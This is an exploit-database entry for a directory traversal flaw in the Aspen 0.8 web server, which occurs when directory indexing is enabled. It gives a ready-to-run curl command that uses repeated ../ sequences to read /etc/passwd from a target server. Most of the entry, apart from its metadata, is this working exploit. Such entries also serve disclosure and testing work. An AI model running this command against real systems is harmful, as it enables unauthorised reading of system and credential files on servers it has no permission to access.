Aspen 0.8 - Directory Traversal

2013-04-02T00:00:00
ID 1337DAY-ID-20593
Type zdt
Reporter Daniel Ricardo
Modified 2013-04-02T00:00:00

Description

Exploit for multiple platform in category web applications

                                        
                                            The vulnerability happens when directory indexing is turned on (default
configuration in this version) and a user requests, for instance
localhost/../../../../../../../etc/passwd.
 
The vulnerability may be tested with the following command-line:
curl -v4 http://<server>:<port>/../../../../../../etc/passwd

#  0day.today [2018-02-02]  #